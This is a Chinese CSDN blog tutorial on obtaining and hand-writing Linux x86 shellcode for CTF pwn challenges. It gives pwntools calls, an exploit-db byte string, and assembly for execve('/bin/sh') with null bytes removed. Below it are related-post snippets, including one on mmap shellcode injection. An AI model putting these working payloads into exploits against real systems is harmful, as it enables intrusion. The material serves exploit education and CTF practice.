PWN-shellcode获取与编写

最新推荐文章于 2024-01-27 15:49:52 发布
最新推荐文章于 2024-01-27 15:49:52 发布
阅读量1.3w 收藏 71
点赞数 19
分类专栏: PWN杂
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35495684/article/details/79583232
版权

当我们在获得程序的漏洞后,就可以在程序的漏洞处执行特定的代码,而这些代码也就是俗称的shellcode。
而shellcode该怎么获得呢?

一、获取集成写好的

1.From pwntools

(1)先设置目标机的参数
context(os=’linux’, arch=’amd64’, log_level=’debug’)
1. os设置系统为linux系统,在完成ctf题目的时候,大多数pwn题目的系统都是linux
2. arch设置架构为amd64,可以简单的认为设置为64位的模式,对应的32位模式是’i386’
3. log_level设置日志输出的等级为debug,这句话在调试的时候一般会设置,这样pwntools会将完整的io过程都打印下来,使得调试更加方便,可以避免在完成CTF题目时出现一些和IO相关的错误。

(2)获取shellcode
1)获得执行system(“/bin/sh”)汇编代码所对应的机器码
asm(shellcraft.sh())
具体利用如下:

from pwn import*
context(log_level = 'debug', arch = 'i386', os = 'linux')
shellcode=asm(shellcraft.sh())

2.利用别人写好的。如exploit-db

利用搜索引擎检索别人写好的可以直接来用的 shellcode。
https://coding.net/u/yihangwang/p/shellcode_spider/git ,。
这是一个 python 爬取 exploit-db 上所有 shellcode 的库。
1)sh对应的shellcode

shellcode = "\x31\xc0\x31\xdb\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\x51\x52\x55\x89\xe5\x0f\x34\x31\xc0\x31\xdb\xfe\xc0\x51\x52\x55\x89\xe5\x0f\x34"

二、自己写

或者可以用msf生成,或者自己反编译一下。

这里写图片描述

这里我们使用一段最简单的执行execve (“/bin/sh”)命令的语句作为shellcode。

以写一个execve(“/bin/sh”)为例子。
在当前位置执行”/bin/sh”,可以用execve(“/bin/sh”,0,0)
C语言利用代码:

#include "stdlib.h"
#include "unistd.h"
char *buf[]={"/bin/sh",NULL};
void main()
{
    execve("/bin/sh",buf,NULL);
    exit(0);
}

execve()用来执行参数filename字符串所代表的文件路径,第二个参数是利用指针数组来传递给执行文件的参数,并且需要以空指针(NULL)结束,最后一个参数则为传递给执行文件的新环境变量数组。
execve()对应的中断向量表为:0x0b,对应eax
可以通过http://syscalls.kernelgrok.com/网站来查询
这里写图片描述
所以我们要做的就是写一个执行execve的汇编代码。

这里不得不提一下int 0x80软中断调用。
第一步,就是需要将系统调用号加入到eax中。
第二步,ebx保存函数调用的第一个参数,ecx、edx、esi、edi分别对应这2345个参数。
如果参数超过5个,就必须将参数数组存储在内存中,而且必须将该数组的地址放在ebx中。
一旦加载寄存器后,就会调用int 0x80 汇编指令来中断,强迫内核暂停手头上的工作并处理该中断。

OK,那我们知道汇编代码的最后一步
mov al,0xb
int 0x80
具体会被代码如下:
构造一个
execve(“/bin/sh”,0,NULL);

global _start
_start:
xor eax,eax  //eax置0
xor edx,edx  //edx置0
push edx
push "/sh"
push "/bin"   //将/bin/sh入栈
mov ebx,esp   //ebx指向/bin/sh这个字符串
xor ecx,ecx
mov al,0Bh    //eax置为execve函数的中断号
int 80h       //调用软中断

运用
nasm -f elf32 文件名.asm
ld -m elf_i386 -o 文件名 文件名.o
objdump -o 文件名
获得汇编的机器码,如下。
这里写图片描述
我们可以看到上图画线处有\00,shellcode在使用时遇到\00会被截断,所以我们要避免出现/x00字节,我们知道00是出现在/bin/sh那里的,重新修改我们的汇编程序:

global _start
_start:
xor eax,eax
xor edx,edx
push edx
push "//sh"
push "/bin"
mov ebx,esp
xor ecx,ecx
mov al,0Bh
int 80h

在终端中”/bin/sh”和”/bin//sh”的效果是一样的。
执行后如下:
这里写图片描述
所以shellcode就是:

shellcode="\x31\xc0\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xb0\x0b\xcd\x80"

参考文章:
http://blog.csdn.net/qq_29343201/article/details/51337025
http://blog.nsfocus.net/easy-implement-shellcode-xiangjie/
http://jaq.alibaba.com/community/art/show?spm=a313e.7916646.24000001.11.MtR4jX&articleid=403
http://blog.csdn.net/qq_29947311/article/details/63680810
https://www.cnblogs.com/elvirangel/p/6974580.html
https://www.jianshu.com/p/d267577c7af1

Jaken1223
关注
  • 19
    点赞
  • 71
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
PWN-shellcode-WP- (一)题目文件.rar
03-29
为几道搜集的真题,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真题。
exploitdb:官方漏洞利用数据库存储库
02-20
漏洞利用数据库Git存储库 这是一个官方的仓库,一个主办。 我们的存储库是: 漏洞和Shellcodes: : 二进制漏洞利用: : 论文: : 漏洞利用数据库是公共漏洞利用和相应的易受攻击软件的存档,专为渗透测试人员和漏洞研究人员使用而开发。 它的目的是作为通过直接提交,邮件列表和其他公共资源收集的, 和的最全面集合,并将它们呈现在可免费使用且易于导航的数据库中。 漏洞利用数据库是漏洞利用和概念验证(而非咨询)的存储库,对于那些立即需要可操作数据的人来说,它是宝贵的资源。 您可以在和了解有关该项目的更多信息。 该存储库每天都会使用最新添加的提交进行更新。 任何其他资源都可以在我们的。 漏洞位于目录中,shellcode位于目录中。 执照 该项目(和SearchSploit)在“ ”下发布。 SearchSploit 该存储库中包含SearchSploit实用程序,使
PWNshellcode技巧newstar2023三道shellcode
最新发布
m0_74312867的博客
01-27 364
我什么都不会
开关电源的PWN-PFM控制电路
12-09
开关电源的PWN-PFM控制电路 邹怀安 张 锐 胡荣强 武汉理工大学自动化学院 1.引言 开关电源由于在体积、重量、效率和可靠性等多多方面的优势,目前在计算机、通信、家用电器、雷达、空间技术等众多领域中已完全取代了传统的线性稳压电源。开关电源的控制技术主要有三种:(1)脉冲宽度调制(PWM);(2)脉冲频率调制(PPN);(3)脉冲宽度频率调制(PWN
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwnshellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
加载不使用execve syscall的静态链接的ELF二进制文件(x86体系结构)。-C/C++开发
05-27
加载不使用execve syscall的静态链接的ELF二进制文件(x86体系结构)。 runtime-unpack加载静态链接的ELF二进制文件(x86体系结构),而无需执行execve syscall。 使用make编译Build&pack:运行编译后,您可以使用./bin/loader二进制文件运行bin / samples / tests / *。packed中的虚拟程序。 加载程序将解压缩小精灵在内存中的位置,将这些段映射到虚拟内存中的正确位置,解析符号并将执行传递给已解压的程序的main()。 示例1(循环,计算和I / O):示例2(系统命令):
shellcode基本知识(PWN
weixin_51758733的博客
07-15 720
shellcode基本知识(PWN
PWN入门(6)写入shellcode
Ba1_Ma0的博客
09-20 1860
pwn"这个词的源起以及它被广泛地普遍使用的原因,源自于魔兽争霸某段讯息上设计师打字时拼错而造成的,原先的字词应该是"own"这个字,因为 ‘p’ 与 ‘o’ 在标准英文键盘上的位置是相邻的,PWN 也是一个黑客语法的俚语词,是指攻破设备或者系统。发音类似"砰”,对黑客而言,这就是成功实施黑客攻击的声音,而在ctf比赛里,pwn是对二进制漏洞的利用下载这个github库,进入05文件夹。
Finding system calls
farmwang的专栏
07-26 388
/usr/include/asm/unistd.h #ifndef _ASM_X86_UNISTD_64_H #define _ASM_X86_UNISTD_64_H 1 #define __NR_read 0 #define __NR_write 1 #define __NR_open 2 #define __NR_close 3 #define __NR_stat 4 #defin
linux环境下shellcode编写:32位和64位
lifanxin的博客
12-10 4205
linux环境下shellcode编写shellcode的理解使用pwntools工具编写自己实现更精炼的32位shellcode64位shellcode shellcode的理解   我们在做pwn的时候经常需要使用shellcode获取到flag,那么shellcode如何理解,简单一句话就是:获取shellcode就是shellcode。   在漏洞利用过程时,我们将精心编制好的shellcode通过有问题的程序写入到内存中,然后执行。该shellcode对应的c语言代码一般为: system
[BUUCTF]PWN——ciscn_2019_s_9(汇编代码写shellcode
mcmuyanga的博客
01-28 1428
ciscn_2019_s_9 附件 步骤 例行检查,32位程序,没用开启任何保护 本地试运行看一下程序大概的情况 32位ida载入,第10行的fgets,能够溢出0x32-0x20-0x4个字节 由于没用nx保护,首先想到的就是往s里写入shellcode,然后跳转到s执行shellcode,s在栈上,ida里有一个函数,为我们提供了跳转到栈上的指令jmp esp 现在就一个问题,s大小只有0x20,用下面的shellcode不懂能不能完全写入 context(log_level = 'debu
build-an-efficient-pwn-environment:如何在2020年建立高效的Pwn开发环境
05-26
在2020年建立高效的Pwn开发环境 多年以来,每当我决定开始学习pwn时,我发现我无法编写漏洞利用程序或无法高效地调试可执行文件。 我最终决定做些改变这种情况的事情。 所以我花了一些时间在相关工具的使用上。 我什至开发了一些脚本和工具来帮助我获得更好的体验。 现在,到2020年,您将拥有一个更高效的pwn开发环境。 您可以在上面的GIF中瞥一眼最终环境。 在本文中,我将向您展示如何构建该环境。 Arch Linux 如果您想拥有一个ELF ,首先需要一个Linux发行版。 我使用 ,该具有强大的来安装各种软件,以下所有部分均基于此。 如果您使用其他Linux发行版甚至是macOS,则可能需要找到在计算机上安装某些软件包的方法。 但是以下配置仍然对您有用。 或者,如果您不想通过命令行安装Linux发行,则可以只切换到或 。 您可能会发现许多文章仍在教您如何使用yaou
Pwn】Rop-Ret2Shellcode-32位
weixin_52553215的博客
05-24 676
ret2text漏洞依赖于程序中存在system(“/bin/sh”)的函数 若没有此函数,可以传入自定义shellcode //shellcode是黑客编写的用于实行特定功能的汇编代码,例如:execve(“/bin/sh”,null,null); Ret2Shellcode条件:1.无执行shell的函数 2.没有开启NX保护 Ret2libc条件:1.开启NX 2.使用li...
虎符CTF2022 —shellcode
qq_54894802的博客
09-21 161
我们进行动态调试,先准备手动脱壳的,脱的时候发现居然有反调试,准备动态调试将反调试的patch但是发现很难脱,脱了半天还在循环,可能太菜的原因(T _ T)。或者记下这个地址,我们使用IDA的附加调试,将IDA附加到程序上,因为程序运行到了打印字符 了,所以壳肯定是解开了。将程序放入X32DBGz中进行分析,我们按F9运行几次,我们就可以运行到我们的OPE之中了。进入之后,我们进行简单的分析可以发现,这个函数实现的是base64加密。看分析还是比较简单,就是将原本程序里面的两端提示,进行加密的。
[BUUCTF]PWN——x_ctf_b0verfl0w(汇编代码写shellcode+jump esp指令劫持esp)
mcmuyanga的博客
02-04 1148
x_ctf_b0verfl0w 附件 步骤 例行检查,32位程序,开启了RELRO(不可改写got表) 本地试运行一下程序,看看大概的情况 32位ida载入 fgets可以溢出,但是只可以溢出0x32-0x20-0x4=14字节,由于没有开启nx,首先想到的是shellcode,0x20肯定放不进pwntools生成的shellcode,只能自己手写,但是得想办法劫持esp去执行我们的shellcode 在hit函数中找到了jump esp的gadget 因此我们可以构造这样的栈
初识 pwn(get_shell、hello_pwn
Welcome To Myon'Blog !
04-01 923
初识pwn、get_shell、hello_pwn、软件保护机制、exp脚本编写pwntools、NX、IDA pro
从BUUCTF之“ciscn_2019_s_9”见32位shellcode的简单写法,以及其中的难解之处
Probeginner的博客
12-09 232
32位简单shellcode
*CTF——shellcode
weixin_34186128的博客
04-28 678
一看题目是利用shellcode解决问题 伪代码: EXP: from pwn import* context(os='linux',arch='amd64',log_level='debug') p = process('./shellcode') shellcode ='s\x00'+ asm(shellcraft.sh()):i,j指针同时指向s,跳出内循环,\x0...
mmap可以获得shellcode
05-11
`mmap()` 函数是用于将文件或设备映射到进程的地址空间的系统调用,它本身并不能获得 shellcode。但是,通过在内存中分配可执行代码的方式,可以将 shellcode 注入到进程的地址空间中,然后使用 `mmap()` 将其映射到进程中。这种技术通常被称为内存映射文件注入(Memory-mapped File Injection)。 在 Linux 中,可以使用 `mmap()` 函数将一个文件映射到进程的地址空间中。然后,可以将 shellcode 写入到文件中,再使用 `mmap()` 将其加载到进程的地址空间中,从而实现代码注入。需要注意的是,这种技术存在一定的风险,因为它可能会破坏进程的内存布局和稳定性,还可能会被杀毒软件和安全防护机制检测到。 总之,通过 `mmap()` 函数可以实现将 shellcode 注入到进程的地址空间中,但需要谨慎使用,以确保安全性和稳定性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值